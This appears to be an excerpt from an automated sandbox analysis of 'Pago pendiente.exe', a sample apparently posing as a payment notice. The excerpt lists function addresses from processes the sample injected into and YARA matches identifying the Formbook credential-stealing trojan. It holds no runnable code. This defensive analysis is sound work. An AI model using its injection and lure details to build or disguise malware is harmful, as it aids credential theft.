          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014EE4F65_2_014EE4F6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014647505_2_01464750
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014407705_2_01440770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0143C7C05_2_0143C7C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0145C6E05_2_0145C6E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014569625_2_01456962
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014429A05_2_014429A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0150A9A65_2_0150A9A6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0144A8405_2_0144A840
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014428405_2_01442840
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0146E8F05_2_0146E8F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014268B85_2_014268B8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014FAB405_2_014FAB40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014F6BD75_2_014F6BD7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0143EA805_2_0143EA80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0144AD005_2_0144AD00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014DCD1F5_2_014DCD1F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0143ADE05_2_0143ADE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01458DBF5_2_01458DBF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01440C005_2_01440C00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01430CF25_2_01430CF2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014E0CB55_2_014E0CB5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014B4F405_2_014B4F40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01482F285_2_01482F28
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01460F305_2_01460F30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014E2F305_2_014E2F30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01432FC85_2_01432FC8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0144CFE05_2_0144CFE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014BEFA05_2_014BEFA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01440E595_2_01440E59
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014FEE265_2_014FEE26
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014FEEDB5_2_014FEEDB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01452E905_2_01452E90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014FCE935_2_014FCE93
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0147516C5_2_0147516C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0142F1725_2_0142F172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0150B16B5_2_0150B16B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0144B1B05_2_0144B1B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014EF0CC5_2_014EF0CC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014470C05_2_014470C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014F70E95_2_014F70E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014FF0E05_2_014FF0E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0142D34C5_2_0142D34C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014F132D5_2_014F132D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0148739A5_2_0148739A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0145B2C05_2_0145B2C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014E12ED5_2_014E12ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014452A05_2_014452A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014F75715_2_014F7571
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_015095C35_2_015095C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014DD5B05_2_014DD5B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014314605_2_01431460
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014FF43F5_2_014FF43F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014FF7B05_2_014FF7B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014856305_2_01485630
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014F16CC5_2_014F16CC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014499505_2_01449950
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0145B9505_2_0145B950
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014D59105_2_014D5910
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014AD8005_2_014AD800
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014438E05_2_014438E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014FFB765_2_014FFB76
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014B5BF05_2_014B5BF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0147DBF95_2_0147DBF9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0145FB805_2_0145FB80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014FFA495_2_014FFA49
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014F7A465_2_014F7A46
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014B3A6C5_2_014B3A6C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014EDAC65_2_014EDAC6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014DDAAC5_2_014DDAAC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01485AA05_2_01485AA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014E1AA35_2_014E1AA3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01443D405_2_01443D40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014F1D5A5_2_014F1D5A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014F7D735_2_014F7D73
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0145FDC05_2_0145FDC0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014B9C325_2_014B9C32
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014FFCF25_2_014FFCF2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014FFF095_2_014FFF09
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01441F925_2_01441F92
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014FFFB15_2_014FFFB1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01449EB05_2_01449EB0
          Source: C:\Windows\explorer.exeCode function: 6_2_0E4CE2326_2_0E4CE232
          Source: C:\Windows\explorer.exeCode function: 6_2_0E4CD0366_2_0E4CD036
          Source: C:\Windows\explorer.exeCode function: 6_2_0E4C40826_2_0E4C4082
          Source: C:\Windows\explorer.exeCode function: 6_2_0E4C5D026_2_0E4C5D02
          Source: C:\Windows\explorer.exeCode function: 6_2_0E4CB9126_2_0E4CB912
          Source: C:\Windows\explorer.exeCode function: 6_2_0E4C8B306_2_0E4C8B30
          Source: C:\Windows\explorer.exeCode function: 6_2_0E4C8B326_2_0E4C8B32
          Source: C:\Windows\explorer.exeCode function: 6_2_0E4D15CD6_2_0E4D15CD
          Source: C:\Windows\explorer.exeCode function: 6_2_101CB0366_2_101CB036
          Source: C:\Windows\explorer.exeCode function: 6_2_101C20826_2_101C2082
          Source: C:\Windows\explorer.exeCode function: 6_2_101C99126_2_101C9912
          Source: C:\Windows\explorer.exeCode function: 6_2_101C3D026_2_101C3D02
          Source: C:\Windows\explorer.exeCode function: 6_2_101CF5CD6_2_101CF5CD
          Source: C:\Windows\explorer.exeCode function: 6_2_101CC2326_2_101CC232
          Source: C:\Windows\explorer.exeCode function: 6_2_101C6B306_2_101C6B30
          Source: C:\Windows\explorer.exeCode function: 6_2_101C6B326_2_101C6B32
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0006764B7_2_0006764B
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0006305C7_2_0006305C
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0006978B7_2_0006978B
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0489E4F67_2_0489E4F6
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048944207_2_04894420
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048A24467_2_048A2446
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048B05917_2_048B0591
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047F05357_2_047F0535
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0480C6E07_2_0480C6E0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047F07707_2_047F0770
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047EC7C07_2_047EC7C0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048147507_2_04814750
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048820007_2_04882000
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048B01AA7_2_048B01AA
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048A41A27_2_048A41A2
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048A81CC7_2_048A81CC
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047E01007_2_047E0100
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0488A1187_2_0488A118
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048781587_2_04878158
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048702C07_2_048702C0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048902747_2_04890274
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048B03E67_2_048B03E6
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047FE3F07_2_047FE3F0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048AA3527_2_048AA352
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04890CB57_2_04890CB5
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047F0C007_2_047F0C00
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047E0CF27_2_047E0CF2
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04808DBF7_2_04808DBF
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047FAD007_2_047FAD00
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0488CD1F7_2_0488CD1F
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047EADE07_2_047EADE0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04802E907_2_04802E90
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048ACE937_2_048ACE93
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047F0E597_2_047F0E59
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048AEEDB7_2_048AEEDB
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048AEE267_2_048AEE26
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0486EFA07_2_0486EFA0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047FCFE07_2_047FCFE0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04832F287_2_04832F28
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04810F307_2_04810F30
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047E2FC87_2_047E2FC8
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04892F307_2_04892F30
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04864F407_2_04864F40
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047F28407_2_047F2840
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047FA8407_2_047FA840
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0481E8F07_2_0481E8F0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D68B87_2_047D68B8
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048BA9A67_2_048BA9A6
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047F29A07_2_047F29A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048069627_2_04806962
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047EEA807_2_047EEA80
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048A6BD77_2_048A6BD7
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048AAB407_2_048AAB40
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047E14607_2_047E1460
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048AF43F7_2_048AF43F
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0488D5B07_2_0488D5B0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048B95C37_2_048B95C3
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048A75717_2_048A7571
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048A16CC7_2_048A16CC
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048356307_2_04835630
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048AF7B07_2_048AF7B0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0489F0CC7_2_0489F0CC
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048A70E97_2_048A70E9
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048AF0E07_2_048AF0E0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047F70C07_2_047F70C0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047DF1727_2_047DF172
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047FB1B07_2_047FB1B0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048BB16B7_2_048BB16B
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0482516C7_2_0482516C
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0480B2C07_2_0480B2C0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048912ED7_2_048912ED
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047F52A07_2_047F52A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0483739A7_2_0483739A
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047DD34C7_2_047DD34C
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048A132D7_2_048A132D
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048AFCF27_2_048AFCF2
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04869C327_2_04869C32
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047F3D407_2_047F3D40
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0480FDC07_2_0480FDC0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048A1D5A7_2_048A1D5A
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048A7D737_2_048A7D73
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047F9EB07_2_047F9EB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048AFFB17_2_048AFFB1
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048AFF097_2_048AFF09
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047B3FD27_2_047B3FD2
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047B3FD57_2_047B3FD5
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047F1F927_2_047F1F92
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0485D8007_2_0485D800
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047F38E07_2_047F38E0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047F99507_2_047F9950
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048859107_2_04885910
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0480B9507_2_0480B950
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04835AA07_2_04835AA0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0488DAAC7_2_0488DAAC
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04891AA37_2_04891AA3
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0489DAC67_2_0489DAC6
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048AFA497_2_048AFA49
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048A7A467_2_048A7A46
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04863A6C7_2_04863A6C
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0480FB807_2_0480FB80
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04865BF07_2_04865BF0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0482DBF97_2_0482DBF9
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048AFB767_2_048AFB76
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_025A9E5B7_2_025A9E5B
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_025A9E607_2_025A9E60
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_025A2FB07_2_025A2FB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_025BECEE7_2_025BECEE
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_025A2D907_2_025A2D90
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_025A2D887_2_025A2D88
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 01475130 appears 58 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 014BF290 appears 105 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 014AEA12 appears 86 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 01487E54 appears 111 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0142B970 appears 280 times
          Source: C:\Windows\SysWOW64\control.exeCode function: String function: 0486F290 appears 105 times
          Source: C:\Windows\SysWOW64\control.exeCode function: String function: 047DB970 appears 280 times
          Source: C:\Windows\SysWOW64\control.exeCode function: String function: 04825130 appears 58 times
          Source: C:\Windows\SysWOW64\control.exeCode function: String function: 0485EA12 appears 86 times
          Source: C:\Windows\SysWOW64\control.exeCode function: String function: 04837E54 appears 111 times
          Source: Pago pendiente.exe, 00000000.00000002.2011441165.0000000004DCF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs Pago pendiente.exe
          Source: Pago pendiente.exe, 00000000.00000002.2008580882.00000000032D1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSimpleLogin.dll8 vs Pago pendiente.exe
          Source: Pago pendiente.exe, 00000000.00000002.2006528335.000000000130E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs Pago pendiente.exe
          Source: Pago pendiente.exe, 00000000.00000002.2016169605.0000000005300000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs Pago pendiente.exe
          Source: Pago pendiente.exe, 00000000.00000002.2020493928.0000000007700000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSimpleLogin.dll8 vs Pago pendiente.exe
          Source: Pago pendiente.exe | Binary or memory string: OriginalFilenameJOoy.exeB vs Pago pendiente.exe
          Source: Pago pendiente.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 5.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Pago pendiente.exe.4f1f2f8.8.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0.2.Pago pendiente.exe.4f1f2f8.8.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Pago pendiente.exe.4f1f2f8.8.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Pago pendiente.exe.4eaf4d8.9.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0.2.Pago pendiente.exe.4eaf4d8.9.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Pago pendiente.exe.4eaf4d8.9.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.4443703751.0000000002C20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000007.00000002.4443703751.0000000002C20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
